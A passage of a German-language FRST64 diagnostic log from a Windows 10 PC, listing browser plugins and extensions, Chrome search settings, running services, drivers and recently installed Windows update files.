{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation) Edge: ====== Edge HomeButtonPage: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> hxxps://www.google.ch/ FireFox: ======== FF ProfilePath: C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-09] FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.) Chrome: ======= CHR HomePage: Default -> msn.com CHR StartupUrls: Default -> "hxxps://www.google.ch/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} CHR Profile: C:\Users\***\AppData\Local\Google\Chrome\User Data\Default [2017-08-09] CHR Extension: (Google*Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01] CHR Extension: (Google Präsentationen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01] CHR Extension: (Google Docs) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01] CHR Extension: (Google Drive) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01] CHR Extension: (YouTube) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01] CHR Extension: (Google Tabellen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01] CHR Extension: (Google Docs Offline) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01] CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01] CHR Extension: (Deutsch Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01] CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01] CHR Extension: (Google Mail) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01] CHR Extension: (Chrome Media Router) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01] CHR Extension: (Skype-Anrufe) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01] CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert] S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] () S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com) S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com) S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert] R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation) S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation) S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation) R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.) R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation) R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation) S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts) R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts) R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH) R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert] R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation) S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.) S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.) S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.) R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm)) S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.) R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.) R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech) R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.) R1 MpKsl174ac0cd; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1930F23C-426D-4967-B2BF-B8BF84D915B1}\MpKsl174ac0cd.sys [44928 2017-08-08] (Microsoft Corporation) R1 MpKsla84e905b; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A7D2BD46-1D78-4F16-85FF-98FC90F0D75A}\MpKsla84e905b.sys [44928 2017-08-09] (Microsoft Corporation) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation) S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation) R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation) R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek) R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.) S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert] S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-09 18:58 - 2017-08-09 18:58 - 002381824 _____ (Farbar) C:\Users\***\Desktop\FRST64.exe 2017-08-09 18:58 - 2017-08-09 18:58 - 000000000 ____D C:\Users\***\Desktop\FRST-OlderVersion 2017-08-09 18:40 - 2017-08-09 18:55 - 000000000 ____D C:\WINDOWS\Minidump 2017-08-08 23:04 - 2017-08-08 23:04 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-08-08 19:26 - 2017-08-01 04:39 - 008319392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-08-08 19:26 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll 2017-08-08 19:26 - 2017-08-01 04:38 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys 2017-08-08 19:26 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-08-08 19:26 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2017-08-08 19:26 - 2017-08-01 04:36 - 000119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-08-08 19:26 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe 2017-08-08 19:26 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe 2017-08-08 19:26 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe 2017-08-08 19:26 - 2017-08-01 04:33 - 000473240 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll 2017-08-08 19:26 - 2017-08-01 04:32 - 002444704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-08-08 19:26 - 2017-08-01 04:32 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2017-08-08 19:26 - 2017-08-01 04:32 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-08-08 19:26 - 2017-08-01 04:31 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 002645680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 000212384 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000723680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000410160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000315288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000182688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000143736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000082336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys 2017-08-08 19:26 - 2017-08-01 04:26 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll 2017-08-08 19:26 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-08-08 19:26 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll 2017-08-08 19:26 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE 2017-08-08 19:26 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-08-08 19:26 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-08-08 19:26 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tokenbinding.dll 2017-08-08 19:26 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2017-08-08 19:26 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sscore.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll 2017-08-08 19:26 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-08-08 19:26 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll 2017-08-08 19:26 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-08-08 19:26 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2017-08-08 19:26 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptprov.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-08-08 19:26 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-08-08 19:26 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-08-08 19:26 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-08-08 19:26 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-08-08 19:26 - 2017-08-01 03:57 - 023677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-08-08 19:26 - 2017-08-01 03:45 - 001275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll 2017-08-08 19:26 - 2017-08-01 03:44 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE 2017-08-08 19:26 - 2017-08-01 03:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys 2017-08-08 19:26 - 2017-08-01 03:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe 2017-08-08 19:26 - 2017-08-01 03:42 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll 2017-08-08 19:26 - 2017-08-01 03:40 - 017366528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-08-08 19:26 - 2017-08-01 03:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll 2017-08-08 19:26 - 2017-08-01 03:39 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll 2017-08-08 19:26 - 2017-08-01 03:38 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll 2017-08-08 19:26 - 2017-08-01 03:38 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll 2017-08-08 19:26 - 2017-08-01 03:36 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-08-08 19:26 - 2017-08-01 03:35 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2017-08-08 19:26 - 2017-08-01 03:34 - 000805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-08-08 19:26 - 2017-08-01 03:33 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-08-08 19:26 - 2017-08-01 03:33 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll 2017-08-08 19:26 - 2017-08-01 03:32 - 007336960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-08-08 19:26 - 2017-08-01 03:32 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 004445696 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 001396736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 008209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-08-08 19:26 - 2017-08-01 03:30 - 001052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll 2017-08-08 19:26 - 2017-08-01 03:28 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-08-08 19:26 - 2017-08-01 03:28 - 002516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 001802752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 000574464 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 000482816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2017-08-08 19:26 - 2017-08-01 03:26 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe 2017-08-08 19:26 - 2017-08-01 03:25 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\coredpus.dll 2017-08-08 19:26 - 2017-08-01 03:25 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll 2017-08-08 19:26 - 2017-08-01 03:25 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll 2017-08-08 19:26 - 2017-07-31 17:15 - 